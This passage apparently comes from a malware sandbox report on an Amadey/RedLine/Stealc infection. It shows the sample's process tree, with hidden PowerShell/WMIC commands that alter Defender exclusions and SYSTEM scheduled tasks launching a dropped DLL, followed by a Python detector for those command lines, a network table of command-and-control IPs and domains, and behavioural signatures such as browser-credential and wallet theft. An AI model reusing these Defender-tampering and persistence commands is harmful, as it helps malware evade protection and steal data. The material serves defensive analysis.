/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "FnGigHNXGPuYnow2" /F /xml "C:\Program Files (x86)\FDxSmxakU\aUoLPQQ.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "FnGigHNXGPuYnow"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "FnGigHNXGPuYnow"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "DfiACOcNeeEuzZ" /F /xml "C:\Program Files (x86)\tEZYwqVfuQYU2\wSfRwKR.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "DXKOGWDrZMiLW2" /F /xml "C:\ProgramData\IrAQtycGxHJKWAVB\WOjutgw.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "WycbLMNWffCalOPaD2" /F /xml "C:\Program Files (x86)\HIJHyLDMFVIrArjMcDR\sOPBqcf.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "SCruIlpVLZHSGSIWWcc2" /F /xml "C:\Program Files (x86)\TjUkTRKCSiJkC\mPdOlvG.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gXgiPdpSGbihZCqEr" /SC once /ST 04:31:34 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\BhywXhhbcuWpvQvH\VcAdtmLG\zhcfGiH.dll\",#1 /XQdidvy 385107" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gXgiPdpSGbihZCqEr"
\??\c:\windows\system32\rundll32.EXE
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\BhywXhhbcuWpvQvH\VcAdtmLG\zhcfGiH.dll",#1 /XQdidvy 385107
C:\Windows\SysWOW64\rundll32.exe
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\BhywXhhbcuWpvQvH\VcAdtmLG\zhcfGiH.dll",#1 /XQdidvy 385107
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "hzhNAJUNSjjdIpELG"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1884 -s 940
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gXgiPdpSGbihZCqEr"
C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\service123.exe
C:\Users\Admin\AppData\Local\Temp\/service123.exe
C:\Users\Admin\Windows.exe
C:\Users\Admin\Windows.exe
C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\service123.exe
C:\Users\Admin\AppData\Local\Temp\/service123.exe
C:\Users\Admin\Windows.exe
C:\Users\Admin\Windows.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\service123.exe
C:\Users\Admin\AppData\Local\Temp\/service123.exe
C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
C:\Users\Admin\Windows.exe
C:\Users\Admin\Windows.exe
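The process tree above records one coherent Defender-neutralisation sequence rather than isolated events: forfiles.exe is used as a launcher so that cmd.exe and reg.exe run under a benign-looking parent; each REG ADD maps a specific Defender ThreatID under the Threats\ThreatIDDefaultAction policy to action 6 (Allow), written to both the 32-bit and 64-bit registry views; the Exclusions\Paths policy is populated with the dropped directories; Add-MpPreference adds the dropped executables as exclusions directly; a base64/UTF-16LE -EncodedCommand wraps a gpupdate /force so the new policy takes effect immediately; and a WMIC call to MSFT_MpPreference.Remove strips an extension exclusion. The following Python detector is an added example for this write-up, not the sandbox's own detection logic and not part of the sample. It runs over command lines transcribed from the tree above (constructed telemetry; the labels, tag names and the DEFENDER_ACTIONS table are this example's own, and the mapping from ThreatID numbers to signature names is not on this page and is not attempted), decodes the -EncodedCommand argument, splits a batched "REG ADD ...;REG ADD ..." line into its statements and reports which ThreatIDs are set to Allow and which paths are excluded.

```python
import base64
import re

# Relative names of the two Defender policy keys written in the tree above.
THREAT_ACTION_KEY = r"windows defender\threats\threatiddefaultaction"
EXCLUSION_PATHS_KEY = r"windows defender\exclusions\paths"

# Defender default-action codes for the Threats policy; 6 is "Allow", so a
# ThreatID mapped to 6 is logged but never remediated.
DEFENDER_ACTIONS = {"1": "Clean", "2": "Quarantine", "3": "Remove",
                    "6": "Allow", "8": "UserDefined", "9": "NoAction", "10": "Block"}

REG_ADD_RE = re.compile(
    r'reg(?:\.exe)?"?\s+add\s+\\?"?(?P<key>HK[A-Z_]+\\[^"\\/]+(?:\\[^"\\/]+)*)',
    re.IGNORECASE)
REG_VALUE_RE = re.compile(
    r'/v\s+\\?"?(?P<name>.+?)\\?"?\s+/t\s+(?P<type>REG_\w+)\s+/d\s+(?P<data>[^\s"\\]+)'
    r'(?:\s+(?P<view>/reg:\d+))?', re.IGNORECASE | re.DOTALL)
ENC_FLAG_RE = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
MPPREF_RE = re.compile(
    r"Add-MpPreference\s+-(ExclusionPath|ExclusionProcess|ExclusionExtension)\s+"
    r"(?:['\"]([^'\"]+)['\"]|(\S+))", re.IGNORECASE)
FORFILES_RE = re.compile(r'(?:^|\s|\\)forfiles(?:\.exe)?"?\s')

# Constructed sample: command lines transcribed from the process tree above, standing in
# for process-creation telemetry. The labels are this example's own.
SAMPLE_CMDLINES = {
    "forfiles_reg": r'''forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"''',
    "batched_reg": r'''powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;"''',
    "exclusion_policy": r'''"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FDxSmxakU" /t REG_DWORD /d 0 /reg:32''',
    "mppreference": r"""powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Windows.exe'""",
    "encoded": r'''powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==''',
    "wmic_remove": r'''"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True''',
    "benign": r'''"C:\Windows\system32\gpupdate.exe" /force''',
}


def decode_encoded_command(cmdline):
    """Plaintext of a PowerShell -EncodedCommand argument (base64 over UTF-16LE), or None."""
    for flag, blob in ENC_FLAG_RE.findall(cmdline):
        if not "encodedcommand".startswith(flag.lower()):
            continue  # -ExecutionPolicy, -ExclusionPath and the like are not it
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue
    return None


def analyze(cmdline):
    """Classify one command line; returns tags plus the concrete values it writes."""
    f = {"tags": set(), "threat_actions": [], "excluded_paths": [], "decoded": None}
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        f["tags"].add("encoded_powershell")
        f["decoded"] = decoded
    text = cmdline + " " + (decoded or "")   # scan the decoded script as well
    low = text.lower()

    if FORFILES_RE.search(low) and " /c " in low:   # forfiles used as a cmd launcher
        f["tags"].add("forfiles_indirect_exec")
    for m in MPPREF_RE.finditer(text):
        f["tags"].add("mppreference_exclusion")
        f["excluded_paths"].append(m.group(2) or m.group(3))
    if "msft_mppreference" in low and "call remove" in low:
        f["tags"].add("mppreference_remove_via_wmic")
    if "gpupdate" in low and "/force" in low and "powershell" in low:
        f["tags"].add("policy_refresh")   # makes the policy keys take effect at once

    # One line can batch many REG ADD statements: attribute each value to its own key.
    adds = list(REG_ADD_RE.finditer(text))
    for i, m in enumerate(adds):
        key = m.group("key").strip().lower()
        end = adds[i + 1].start() if i + 1 < len(adds) else len(text)
        v = REG_VALUE_RE.search(text, m.end(), end)
        if v is None:
            continue
        if key.endswith(THREAT_ACTION_KEY):
            f["tags"].add("defender_threat_action_policy")
            action = DEFENDER_ACTIONS.get(v.group("data"), "unknown")
            f["threat_actions"].append((v.group("name"), action, v.group("view")))
        elif key.endswith(EXCLUSION_PATHS_KEY):
            f["tags"].add("defender_exclusion_policy")
            f["excluded_paths"].append(v.group("name"))
    return f


def scan(cmdlines):
    """Run analyze() over {label: cmdline}; keep only the lines with findings."""
    results = {}
    for label, cmdline in cmdlines.items():
        r = analyze(cmdline)
        if r["tags"]:
            results[label] = r
    return results


if __name__ == "__main__":
    for label, r in scan(SAMPLE_CMDLINES).items():
        print(label, sorted(r["tags"]), r["threat_actions"], r["excluded_paths"])
```

On a live host the same facts can be confirmed directly: the policy keys above are under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender (a policy write needs SYSTEM or admin, which the schtasks /RU "SYSTEM" entries provide), and Get-MpPreference shows the exclusions that Add-MpPreference added. Any ThreatID under ThreatIDDefaultAction set to 6, or an exclusion on a Temp, ProgramData or Chrome Extensions path, is worth treating as tampering until an owner is found.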
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| RU | 185.215.113.117:80 | 185.215.113.117 | tcp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.113.215.185.in-addr.arpa | udp |
| DE | 95.179.250.45:26212 | | tcp |
| RU | 185.215.113.26:80 | 185.215.113.26 | tcp |
| US | 8.8.8.8:53 | 45.250.179.95.in-addr.arpa | udp |
| FI | 65.21.18.51:45580 | | tcp |
| US | 8.8.8.8:53 | 26.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.18.21.65.in-addr.arpa | udp |
| RU | 185.215.113.26:80 | 185.215.113.26 | tcp |
| US | 8.8.8.8:53 | stagingbyvdveen.com | udp |
| RU | 185.215.113.17:80 | 185.215.113.17 | tcp |
| FI | 95.216.107.53:12311 | | tcp |
| US | 8.8.8.8:53 | 17.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.107.216.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 154.216.17.216:80 | 154.216.17.216 | tcp |
| US | 8.8.8.8:53 | 216.17.216.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sevtv17sb.top | udp |
| RU | 194.87.248.136:80 | sevtv17sb.top | tcp |
| US | 8.8.8.8:53 | fivev5sb.top | udp |
| RU | 80.249.144.180:80 | fivev5sb.top | tcp |
| TM | 91.202.233.158:80 | 91.202.233.158 | tcp |
| US | 8.8.8.8:53 | 136.248.87.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.144.249.80.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.233.202.91.in-addr.arpa | udp |
| RU | 185.215.113.67:15206 | | tcp |
| FI | 95.216.143.20:12695 | | tcp |
| US | 8.8.8.8:53 | 67.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.143.216.95.in-addr.arpa | udp |
| RU | 80.249.144.180:80 | fivev5sb.top | tcp |
| RU | 80.66.75.114:80 | 80.66.75.114 | tcp |
| US | 8.8.8.8:53 | 114.75.66.80.in-addr.arpa | udp |
| RU | 80.249.144.180:80 | fivev5sb.top | tcp |
| US | 8.8.8.8:53 | conditionprovice.pro | udp |
| FI | 81.19.139.138:443 | conditionprovice.pro | tcp |
| US | 8.8.8.8:53 | 138.139.19.81.in-addr.arpa | udp |
| RU | 185.215.113.19:80 | 185.215.113.19 | tcp |
| RU | 185.215.113.19:80 | 185.215.113.19 | tcp |
| US | 8.8.8.8:53 | 19.113.215.185.in-addr.arpa | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| RU | 185.215.113.26:80 | 185.215.113.26 | tcp |
| FI | 65.21.18.51:45580 | | tcp |
| US | 8.8.8.8:53 | evoto-pc.ru | udp |
| RU | 37.140.192.11:443 | evoto-pc.ru | tcp |
| US | 8.8.8.8:53 | 11.192.140.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240902175059845.std.kqve01.top | udp |
| FI | 95.216.107.53:12311 | | tcp |
| CH | 179.43.188.227:80 | 240902175059845.std.kqve01.top | tcp |
| US | 8.8.8.8:53 | 227.188.43.179.in-addr.arpa | udp |
| NL | 45.200.149.147:80 | 45.200.149.147 | tcp |
| US | 8.8.8.8:53 | 147.149.200.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| RU | 194.58.114.223:80 | 194.58.114.223 | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 223.114.58.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 52.111.229.48:443 | tcp | |
| US | 8.8.8.8:53 | CvcMEMMQKdoWtsiZdkN.CvcMEMMQKdoWtsiZdkN | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| FR | 176.150.119.15:56001 | tcp | |
| US | 103.130.147.211:80 | 103.130.147.211 | tcp |
| US | 8.8.8.8:53 | 211.147.130.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tmpfiles.org | udp |
| US | 104.21.21.16:443 | tmpfiles.org | tcp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| US | 8.8.8.8:53 | 16.21.21.104.in-addr.arpa | udp |
| GB | 142.250.179.227:80 | c.pki.goog | tcp |
| NL | 45.66.231.48:80 | tcp | |
| US | 8.8.8.8:53 | 227.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.231.66.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| FI | 81.19.139.138:443 | conditionprovice.pro | tcp |
| US | 8.8.8.8:53 | millyscroqwp.shop | udp |
| US | 8.8.8.8:53 | locatedblsoqp.shop | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | traineiwnqo.shop | udp |
| US | 8.8.8.8:53 | condedqpwqm.shop | udp |
| US | 8.8.8.8:53 | evoliutwoqm.shop | udp |
| US | 8.8.8.8:53 | stagedchheiqwo.shop | udp |
| US | 8.8.8.8:53 | stamppreewntnq.shop | udp |
| US | 8.8.8.8:53 | caffegclasiqwp.shop | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | tenntysjuxmz.shop | udp |
| US | 172.67.141.209:443 | tenntysjuxmz.shop | tcp |
| US | 8.8.8.8:53 | 85.99.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.141.67.172.in-addr.arpa | udp |
| FR | 176.150.119.15:56002 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| NL | 45.200.149.147:27667 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| FR | 176.150.119.15:56003 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | exonic-hacks.com | udp |
| DE | 185.216.214.225:1920 | exonic-hacks.com | tcp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | 225.214.216.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | service-domain.xyz | udp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 92.123.143.218:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 30.81.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.117.210.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.143.123.92.in-addr.arpa | udp |
| FR | 176.150.119.15:56001 | tcp | |
| US | 8.8.8.8:53 | 10.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.179.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.179.227:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 216.58.204.78:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 142.250.200.1:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | 78.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api3.check-data.xyz | udp |
| US | 44.236.110.137:80 | api3.check-data.xyz | tcp |
| US | 8.8.8.8:53 | 137.110.236.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| FR | 176.150.119.15:56002 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| NL | 45.200.149.147:27667 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| FR | 176.150.119.15:56003 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| RU | 185.215.113.26:80 | 185.215.113.26 | tcp |
| FR | 176.150.119.15:56001 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| FR | 176.150.119.15:56002 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| NL | 45.200.149.147:27667 | tcp | |
| RU | 185.215.113.19:80 | 185.215.113.19 | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| FR | 176.150.119.15:56003 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | 57.110.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| FR | 176.150.119.15:56001 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| FR | 176.150.119.15:56002 | tcp | |
| NL | 45.200.149.147:27667 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
Files
Analysis: behavioral1
Detonation Overview
| Submitted | 2024-09-09 05:02 |
| Reported | 2024-09-09 05:07 |
| Platform | win7-20240708-en |
| Max time kernel | 291s |
| Max time network | 263s |
Command Line
Signatures
Amadey
CryptBot
RedLine
RedLine payload
Stealc
Credentials from Password Stores: Credentials from Web Browsers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\acentric = "\"C:\\Users\\Admin\\Pictures\\Opportunistic Telegraph\\acentric.exe\" /update" | C:\Users\Admin\AppData\Local\Temp\1000269001\acentric.exe | N/A |
Checks installed software on the system
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1296 set thread context of 3060 | N/A | C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 2276 set thread context of 2400 | N/A | C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 1736 set thread context of 1864 | N/A | C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe | C:\Users\Admin\AppData\Local\Temp\svchost015.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Hkbsse.job | C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe | N/A |
| File created | C:\Windows\Tasks\axplong.job | C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\UUzqnLVZ2x.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\e7f7qWroxW.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000269001\acentric.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000026001\joffer2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\svchost015.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\filename.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
